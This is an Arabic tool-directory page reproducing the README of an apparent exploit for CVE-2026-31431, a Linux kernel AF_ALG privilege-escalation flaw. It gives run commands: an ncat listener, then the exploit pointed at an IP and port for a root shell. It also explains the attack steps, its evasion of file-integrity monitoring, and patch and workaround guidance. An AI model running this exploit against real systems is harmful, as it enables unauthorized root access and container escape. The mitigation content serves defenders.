Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431-RCE-Exploit — استغلال تصعيد الامتيازات المحلية لثغرة CVE-2026-31431، وهي خلل منطقي في نواة لينكس AF_ALG يسمح للمستخدمين غير المصرح لهم بكتابة 4 بايتات في ذاكرة التخزين المؤقت للصفحات والحصول على صلاحيات الجذر. يتضمن سكربت إثبات المفهوم (PoC) وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرالهروب من الحاويةاستغلال الملفات الثنائية
GitHubm4xsec/cve-2026-31431-rce-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31431-RCE-Exploit

استغلال تصعيد الامتيازات المحلية لثغرة CVE-2026-31431، وهي خلل منطقي في نواة لينكس AF_ALG يسمح للمستخدمين غير المصرح لهم بكتابة 4 بايتات في ذاكرة التخزين المؤقت للصفحات والحصول على صلاحيات الجذر. يتضمن سكربت إثبات المفهوم (PoC) وإرشادات التخفيف.

عرض المستودع
72منذ 3 أشهرلم تتم المراجعة بعد

🔴 CVE-2026-31431 — "Copy Fail"

ثغرة منطقية عمرها 9 سنوات في نواة لينكس تمنح صلاحيات الجذر في ثوانٍ

CVE CVSS Kernel Since


نظرة عامة

Copy Fail هي ثغرة رفع صلاحيات محلية (LPE) عالية الخطورة في النظام الفرعي للتشفير في نواة لينكس (algif_aead). تم اكتشافها والإفصاح عنها بواسطة Theori (عبر أداة أبحاث الثغرات المدعومة بالذكاء الاصطناعي Xint Code) في 29 أبريل 2026. تسمح هذه الثغرة لأي مستخدم محلي غير مميز بكتابة 4 بايتات مُتحكم بها في ذاكرة التخزين المؤقت للصفحات (page cache) لأي ملف قابل للقراءة — واستغلال ذلك للحصول على صلاحيات الجذر على جميع توزيعات لينكس الرئيسية تقريبًا التي صدرت منذ 2017.

استغلال إثبات المفهوم العامل يبلغ حجمه ~732 بايت فقط من بايثون.


الاستغلال

  1. تشغيل مستمع Ncat
root@kitploit:~
sudo ncat -lvnp PORT
  1. تنفيذ الاستغلال على الجهاز المستهدف
root@kitploit:~
# باستخدام سكربت بايثون
python3 CVE-2026-31431-Exploit.py IP PORT

# ثنائي مُجمّع
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT

🧬 الملخص الفني

كيف يعمل الاستغلال (4 خطوات)

  1. فتح مقبس AF_ALG وربطه بـ authencesn(hmac(sha256),cbc(aes))
  2. لصق (Splice) صفحات ثنائي setuid قابل للقراءة في المقبس
  3. كتابة AEAD المؤقتة للنواة تستبدل 4 بايتات في ذاكرة التخزين المؤقت لذلك الثنائي
  4. تنفيذ ثنائي setuid المُفسد الآن ← قشرة جذر

لماذا هي خطيرة

  • لا نافذة سباق — حتمية، تعمل في كل مرة
  • لا حاجة لإزاحة النواة / تجاوز KASLR
  • نفس الاستغلال يعمل عبر التوزيعات — Ubuntu، RHEL، Amazon Linux، SUSE، Rocky، وغيرها
  • الهروب من الحاويات — ذاكرة التخزين المؤقت للصفحات مشتركة؛ الكتابة من داخل حاوية تؤثر على المضيف
  • لا تعديل على القرص — أدوات مراقبة سلامة الملفات (AIDE، OSSEC، إلخ) لن تكتشفها
  • لا أثر جنائي على القرص

🎯 الإصدارات المتأثرة

التوزيعات المؤكدة كمتأثرة

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

بشكل أساسي، جميع توزيعات لينكس الرئيسية الصادرة منذ 2017 متأثرة.


🛡️ التخفيف

1. التصحيح (موصى به)

قم بتحديث نواتك إلى إصدار يحتوي على commit الإصلاح fafe0fa2995a. معظم التوزيعات الرئيسية أصدرت أو تصدر حزم نواة محدّثة.

2. حلول مؤقتة

إذا لم تتمكن من التصحيح فورًا:

  • حظر إنشاء مقبس AF_ALG عبر سياسة seccomp
  • حظر وحدة algif_aead النمطية:
    root@kitploit:~
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ إخلاء مسؤولية

هذا المستودع لأغراض تعليمية ودفاعية فقط. المعلومات الواردة هنا تهدف إلى مساعدة فرق الأمن على فهم واكتشاف وتخفيف CVE-2026-31431. التزم دائمًا بممارسات الإفصاح المسؤول والقوانين المعمول بها.


⭐ قم بتمييز هذا المستودع بنجمة للبقاء على اطلاع على التصحيحات وإرشادات الكشف.

تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-31431
درجة CVSS7.8 (عالية)
النوعرفع صلاحيات محلي (LPE)
المكوّنalgif_aead — واجهة التشفير AF_ALG للمستخدم في نواة لينكس
السبب الجذريخلل منطقي في قالب AEAD authencesn؛ تحسين في المكان (commit 72548b093ee3، أغسطس 2017) يتسبب في ظهور صفحات ذاكرة التخزين المؤقت في قائمة التشتت القابلة للكتابة للنواة
الأوليةكتابة مُتحكم بها من 4 بايتات في ذاكرة التخزين المؤقت للصفحات لأي ملف قابل للقراءة
آلية الاستغلالمقبس AF_ALG ← splice() ← إفساد ذاكرة التخزين المؤقت لثنائي setuid ← الجذر
حالة سباق؟❌ لا — خلل منطقي مباشر، موثوق 100%
هل يلزم إزاحة النواة؟❌ لا
commit الإصلاحfafe0fa2995a (يلغي تحسين 2017)
متأثرةغير متأثرة
نواة لينكس 4.14 حتى 7.0-rcالنوى قبل 4.14 (قبل commit أغسطس 2017)
جميع 6.18.x قبل 6.18.226.18.22+ (مُصححة)
جميع 6.19.x قبل 6.19.126.19.12+ (مُصححة)